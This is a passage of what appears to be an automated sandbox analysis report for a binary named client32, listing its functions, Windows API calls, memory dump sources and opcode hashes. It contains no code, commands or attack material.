                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalInitializeSection_memset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 453477542-0
                                                                                                                                                    • Opcode ID: b70e1f074512ce2ced997d39b2297f4199a589ff9b013c872d54b649f42912e3
                                                                                                                                                    • Instruction ID: 67e0870afe33de0d146d23e59662f9f8cfec19dbcaf4764f519a7c8a3238bf1f
                                                                                                                                                    • Opcode Fuzzy Hash: b70e1f074512ce2ced997d39b2297f4199a589ff9b013c872d54b649f42912e3
                                                                                                                                                    • Instruction Fuzzy Hash: CC1157B1901B148FC3A4CF7A99816C3FAE5BB58354F90892E95EEC2600DB756564CF90
                                                                                                                                                    Function 11145010 Relevance: 3.0, APIs: 2, Instructions: 34windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11145031
                                                                                                                                                    • ExtractIconExA.SHELL32(?,00000000,000F02BB,00050289,00000001), ref: 11145068
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExtractFileIconModuleName
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3911389742-0
                                                                                                                                                    • Opcode ID: 6ebcb2ed19ff45d4e03ce3bb4affc9ea6a4a037fcd6ce03922cabf34851b5b2f
                                                                                                                                                    • Instruction ID: 51784f3a6cc6e5149e616e04a2eb2c6e0d372b09ba8f06c96ffc5d3ba3765e1d
                                                                                                                                                    • Opcode Fuzzy Hash: 6ebcb2ed19ff45d4e03ce3bb4affc9ea6a4a037fcd6ce03922cabf34851b5b2f
                                                                                                                                                    • Instruction Fuzzy Hash: F5F0BB79A4411C5FE718DFA0CC51FF9B36AE784709F444269E956D61C4CE70594CC741
                                                                                                                                                    Function 11164C77 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 1116A1AF: __getptd_noexit.LIBCMT ref: 1116A1AF
                                                                                                                                                    • __lock_file.LIBCMT ref: 11164CBE
                                                                                                                                                      • Part of subcall function 1116BE59: __lock.LIBCMT ref: 1116BE7E
                                                                                                                                                    • __fclose_nolock.LIBCMT ref: 11164CC9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2800547568-0
                                                                                                                                                    • Opcode ID: 271288d31555c81154ec7293090fb485e1e9931888df87aecff959c56407cd41
                                                                                                                                                    • Instruction ID: afac539be2367be23e5fb54bb350a7e23aa7a519b2fcc5708fa11322496ce6e3
                                                                                                                                                    • Opcode Fuzzy Hash: 271288d31555c81154ec7293090fb485e1e9931888df87aecff959c56407cd41
                                                                                                                                                    • Instruction Fuzzy Hash: B4F0F0358017138AD7109B78CC0078EFBE96F0133CF1182088434AA6D4CBFA6521DB46
                                                                                                                                                    Function 6CA96C1E Relevance: 3.0, APIs: 2, Instructions: 30sleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 6CA96C26
                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 6CA96C5B
                                                                                                                                                      • Part of subcall function 6CA96940: GetTickCount.KERNEL32 ref: 6CA96950
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CountTick$Sleep
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4250438611-0
                                                                                                                                                    • Opcode ID: 8293aced150113f9e3f74cde333c4431c805f00f7975c79a82665e91f9b2bd15
                                                                                                                                                    • Instruction ID: 21455ad817fda5ae90745712e72cd60681879e0ac366a9825cdcadb6a87acb13
                                                                                                                                                    • Opcode Fuzzy Hash: 8293aced150113f9e3f74cde333c4431c805f00f7975c79a82665e91f9b2bd15
                                                                                                                                                    • Instruction Fuzzy Hash: 7FF03A7171420A8BCF5CEB75964A358B2F2EF5235DF16412AD412D6B80C7758ACAC681
                                                                                                                                                    Function 1117602D Relevance: 3.0, APIs: 2, Instructions: 18COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __lock.LIBCMT ref: 11176045
                                                                                                                                                      • Part of subcall function 1117459F: __mtinitlocknum.LIBCMT ref: 111745B5
                                                                                                                                                      • Part of subcall function 1117459F: __amsg_exit.LIBCMT ref: 111745C1
                                                                                                                                                      • Part of subcall function 1117459F: EnterCriticalSection.KERNEL32(?,?,?,1116C592,0000000D), ref: 111745C9
                                                                                                                                                    • __tzset_nolock.LIBCMT ref: 11176056
                                                                                                                                                      • Part of subcall function 1117594C: __lock.LIBCMT ref: 1117596E
                                                                                                                                                      • Part of subcall function 1117594C: ____lc_codepage_func.LIBCMT ref: 111759B5
                                                                                                                                                      • Part of subcall function 1117594C: __getenv_helper_nolock.LIBCMT ref: 111759D7
                                                                                                                                                      • Part of subcall function 1117594C: _free.LIBCMT ref: 11175A0E
                                                                                                                                                      • Part of subcall function 1117594C: _strlen.LIBCMT ref: 11175A15
                                                                                                                                                      • Part of subcall function 1117594C: __malloc_crt.LIBCMT ref: 11175A1C
                                                                                                                                                      • Part of subcall function 1117594C: _strlen.LIBCMT ref: 11175A32
                                                                                                                                                      • Part of subcall function 1117594C: _strcpy_s.LIBCMT ref: 11175A40
                                                                                                                                                      • Part of subcall function 1117594C: __invoke_watson.LIBCMT ref: 11175A55
                                                                                                                                                      • Part of subcall function 1117594C: _free.LIBCMT ref: 11175A64
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1828324828-0
                                                                                                                                                    • Opcode ID: e9fe97314170dd3ace1c63e43c84978c6283960cf81703fd067dc8cc761c8193
                                                                                                                                                    • Instruction ID: d808ca63efd1e9ffab5fb640758e365785c4d1c524b5d003c7d68937386cb31b
                                                                                                                                                    • Opcode Fuzzy Hash: e9fe97314170dd3ace1c63e43c84978c6283960cf81703fd067dc8cc761c8193
                                                                                                                                                    • Instruction Fuzzy Hash: 7AE05B7E8877B3DAE7139FB4469060CF670AB05B3EF6011E5D060556C4CF701555C792
                                                                                                                                                    Function 6CA863A0 Relevance: 3.0, APIs: 2, Instructions: 10sleepnetworkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • WSACancelBlockingCall.WSOCK32 ref: 6CA863A9
                                                                                                                                                    • Sleep.KERNEL32(00000032), ref: 6CA863B3
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: BlockingCallCancelSleep
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3706969569-0
                                                                                                                                                    • Opcode ID: 04baabd1e2eb82d48990de942721d7e1855566f3ecc6de2a81864de4c2bdba35
                                                                                                                                                    • Instruction ID: 22cdbfe6d138d98c78dcbd41094adbf8da53edf449e7302c9742fd8d8c9564f4
                                                                                                                                                    • Opcode Fuzzy Hash: 04baabd1e2eb82d48990de942721d7e1855566f3ecc6de2a81864de4c2bdba35
                                                                                                                                                    • Instruction Fuzzy Hash: A6B092A03A32629ABB0513B10A0E3AA21988F8424BF6544602B41C9A85EF20C289A021
                                                                                                                                                    Function 11145A70 Relevance: 2.6, APIs: 2, Instructions: 58sleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 11145990: ExpandEnvironmentStringsA.KERNEL32(000000FF,?,00000104,000000FF), ref: 111459B7
                                                                                                                                                      • Part of subcall function 11164EAD: __fsopen.LIBCMT ref: 11164EBA
                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,000000FF,?), ref: 11145AA5
                                                                                                                                                    • Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,000000FF,?), ref: 11145AB5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3768737497-0
                                                                                                                                                    • Opcode ID: a3a7e4752acc607997ac4dc0a72fcac428bfa81aec4d9fb6ca4c049ea981d30d
                                                                                                                                                    • Instruction ID: 034c310a398a014eacf4d95463f41bd89d414178975837bd0fbb5aed6b89dd46
                                                                                                                                                    • Opcode Fuzzy Hash: a3a7e4752acc607997ac4dc0a72fcac428bfa81aec4d9fb6ca4c049ea981d30d
                                                                                                                                                    • Instruction Fuzzy Hash: E8110476940319ABEB119F90CDC4A6FF3B8EF85A29F300165EC0097A00D775AD51C7A2
                                                                                                                                                    Function 11010AE0 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 11010B94
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LockitLockit::_std::_
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3382485803-0
                                                                                                                                                    • Opcode ID: 900fd30ae7a6edcb6a0dfa434b7c013aaa35b72064ad6defd4f97f4d13ad8da4
                                                                                                                                                    • Instruction ID: 6fbf298b81733ad5c02794b6394837a2ddc0a350229d48e3ddb53e27456ddbdc
                                                                                                                                                    • Opcode Fuzzy Hash: 900fd30ae7a6edcb6a0dfa434b7c013aaa35b72064ad6defd4f97f4d13ad8da4
                                                                                                                                                    • Instruction Fuzzy Hash: F1516B74A00649DFDB04CF98C980AADFBF5BF89318F248298D5469B385C776E942CB90
                                                                                                                                                    Function 11143BD0 Relevance: 1.6, APIs: 1, Instructions: 70registryCOMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,76968400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: QueryValue
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3660427363-0
                                                                                                                                                    • Opcode ID: 91328a05fa49adc7f96a877065892eb549607f162fa4bf6631575699f60be126
                                                                                                                                                    • Instruction ID: ee220ac459adc96ef86e18eb3808082b68f6554a37139a9005b103db31ef1b78
                                                                                                                                                    • Opcode Fuzzy Hash: 91328a05fa49adc7f96a877065892eb549607f162fa4bf6631575699f60be126
                                                                                                                                                    • Instruction Fuzzy Hash: 2611B97171C2795FEB15CE46D690AAEFB6AEBC5F14F30816BE51947D00C332A482C754
                                                                                                                                                    Function 110FB470 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,?), ref: 110FB49D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InformationToken
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4114910276-0
                                                                                                                                                    • Opcode ID: 2187bc4dd0207f2c4cff668421eac79af3382fb4f4e0b6f0c948954ee106bd6b
                                                                                                                                                    • Instruction ID: 0dd0dc8a76de1486b7c0157bd4876b78410922a839ecfb631160e4ccf4e8658d
                                                                                                                                                    • Opcode Fuzzy Hash: 2187bc4dd0207f2c4cff668421eac79af3382fb4f4e0b6f0c948954ee106bd6b
                                                                                                                                                    • Instruction Fuzzy Hash: E1118671A0055D9BDB11CFA8DD51BEEB3E8DB48309F0041D9E9499B340EA70AE488B90
                                                                                                                                                    Function 6CAAA082 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,6CAA6F16,00000000,?,6CAAD40B,00000001,6CAA6F16,00000000,00000000,00000000,?,6CAA6F16,00000001,00000214), ref: 6CAAA0C5
                                                                                                                                                      • Part of subcall function 6CAA60F9: __getptd_noexit.LIBCMT ref: 6CAA60F9
